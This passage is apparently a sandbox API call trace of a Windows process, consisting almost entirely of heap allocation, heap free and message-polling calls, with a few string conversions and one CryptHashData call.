dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0267.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0267.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0267.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0267.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54260 | out: hHeap=0x970000) returned 1 [0267.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bc8 | out: hHeap=0x970000) returned 1 [0267.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0267.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0267.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0267.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0267.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0267.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0267.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c70 | out: hHeap=0x970000) returned 1 [0267.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51da8 | out: hHeap=0x970000) returned 1 [0267.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0267.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e98 | out: hHeap=0x970000) returned 1 [0267.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cd0 | out: hHeap=0x970000) returned 1 [0267.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cb8 | out: hHeap=0x970000) returned 1 [0267.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e20 | out: hHeap=0x970000) returned 1 [0267.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ce8 | out: hHeap=0x970000) returned 1 [0267.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d18 | out: hHeap=0x970000) returned 1 [0267.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e50 | out: hHeap=0x970000) returned 1 [0267.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d30 | out: hHeap=0x970000) returned 1 [0267.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51df0 | out: hHeap=0x970000) returned 1 [0267.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c10 | out: hHeap=0x970000) returned 1 [0267.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dc0 | out: hHeap=0x970000) returned 1 [0267.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d48 | out: hHeap=0x970000) returned 1 [0267.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0267.421] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0267.421] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0267.421] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0267.421] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0267.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f148d8 [0267.421] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14d28 | out: hHeap=0x970000) returned 1 [0267.421] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0267.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0267.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0267.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0267.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0267.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0267.421] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0267.421] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0267.421] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0267.421] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0267.421] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0267.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0267.421] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0267.421] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0267.421] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0267.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0267.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0267.421] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0267.421] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0267.421] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0267.421] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0267.421] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0267.421] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0267.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0267.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0267.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0267.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0267.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0267.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0267.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b88 [0267.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0267.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0267.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0267.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0267.422] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0267.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54f38 [0267.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0267.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0267.422] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0267.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0267.422] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54f68, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0267.422] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0267.422] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0267.422] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0267.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0267.422] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0267.422] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0267.422] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0267.422] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0267.422] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0267.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0267.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0267.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0267.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0267.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0267.423] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0267.423] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0267.423] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0267.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977ae8 [0267.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0267.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0267.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0267.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0267.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0267.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0267.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0267.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0267.423] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0267.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0267.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0267.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0267.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b48 [0267.424] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977c98 [0267.424] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0267.424] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0267.424] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0267.424] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0267.424] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e55068, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0267.424] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0267.424] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0267.424] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0267.424] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0267.424] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0267.424] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55a40 [0267.424] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0267.424] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0267.424] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0267.424] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0267.424] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0267.424] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0267.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e08 [0267.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0267.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0267.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e20 [0267.425] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0267.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xe) returned 0x2e51c70 [0267.425] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2e51c70, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0267.425] CryptHashData (hHash=0xa87710, pbData=0x2e54f38, dwDataLen=0x3, dwFlags=0x1) returned 1 [0267.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f15a18 [0267.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699a8 [0267.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551e8 [0267.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e08 [0267.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e20 [0267.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e50 [0267.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551a8 [0267.425] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e50 | out: hHeap=0x970000) returned 1 [0267.425] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551a8 | out: hHeap=0x970000) returned 1 [0267.425] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e20 | out: hHeap=0x970000) returned 1 [0267.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e20 [0267.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cd0 [0267.426] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cb8 [0267.426] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551f8 [0267.426] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cb8 | out: hHeap=0x970000) returned 1 [0267.426] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551f8 | out: hHeap=0x970000) returned 1 [0267.426] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cd0 | out: hHeap=0x970000) returned 1 [0267.426] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cd0 [0267.426] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e68 [0267.426] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e98 [0267.426] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551b8 [0267.426] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e98 | out: hHeap=0x970000) returned 1 [0267.426] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551b8 | out: hHeap=0x970000) returned 1 [0267.426] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e68 | out: hHeap=0x970000) returned 1 [0267.426] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e698c8 [0267.426] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977ae8 [0267.426] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c88 [0267.426] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552a8 [0267.426] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e98 [0267.426] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cb8 [0267.426] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d30 [0267.426] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55218 [0267.426] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d30 | out: hHeap=0x970000) returned 1 [0267.426] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55218 | out: hHeap=0x970000) returned 1 [0267.426] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cb8 | out: hHeap=0x970000) returned 1 [0267.426] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c10 [0267.426] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e50 [0267.426] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e68 [0267.426] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55228 [0267.427] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e68 | out: hHeap=0x970000) returned 1 [0267.427] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55228 | out: hHeap=0x970000) returned 1 [0267.427] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e50 | out: hHeap=0x970000) returned 1 [0267.427] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0267.427] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0267.427] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0267.427] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0267.427] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d48 | out: hHeap=0x970000) returned 1 [0267.427] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51df0 | out: hHeap=0x970000) returned 1 [0267.427] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0267.427] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0267.427] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0267.427] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0267.427] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0267.427] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0267.427] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0267.427] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0267.427] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0267.427] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0267.427] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0267.427] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c28 | out: hHeap=0x970000) returned 1 [0267.427] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0267.427] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977b48 | out: hHeap=0x970000) returned 1 [0267.427] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a08 | out: hHeap=0x970000) returned 1 [0267.427] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c40 | out: hHeap=0x970000) returned 1 [0267.427] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d18 | out: hHeap=0x970000) returned 1 [0267.427] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ca0 | out: hHeap=0x970000) returned 1 [0267.427] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51da8 | out: hHeap=0x970000) returned 1 [0267.427] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dc0 | out: hHeap=0x970000) returned 1 [0267.428] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bf8 | out: hHeap=0x970000) returned 1 [0267.428] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dd8 | out: hHeap=0x970000) returned 1 [0267.428] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0267.428] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0267.428] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d60 | out: hHeap=0x970000) returned 1 [0267.428] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51be0 | out: hHeap=0x970000) returned 1 [0267.428] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e38 | out: hHeap=0x970000) returned 1 [0267.428] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d78 | out: hHeap=0x970000) returned 1 [0267.428] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d90 | out: hHeap=0x970000) returned 1 [0267.428] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c58 | out: hHeap=0x970000) returned 1 [0267.428] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0267.428] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55208 | out: hHeap=0x970000) returned 1 [0267.428] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f148d8 | out: hHeap=0x970000) returned 1 [0267.428] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f153a0 [0267.428] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f15a18 | out: hHeap=0x970000) returned 1 [0267.428] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0267.428] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55278 [0267.428] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55148 [0267.428] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55208 [0267.428] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0267.428] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e551f8 [0267.428] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551f8 | out: hHeap=0x970000) returned 1 [0267.428] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55208 | out: hHeap=0x970000) returned 1 [0267.428] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0267.428] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55148 | out: hHeap=0x970000) returned 1 [0267.428] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55278 | out: hHeap=0x970000) returned 1 [0267.428] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0267.428] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0267.428] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0267.429] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0267.429] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e551b8 [0267.429] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51df0 [0267.429] RtlAllocateHeap (HeapHandle=0x970000, 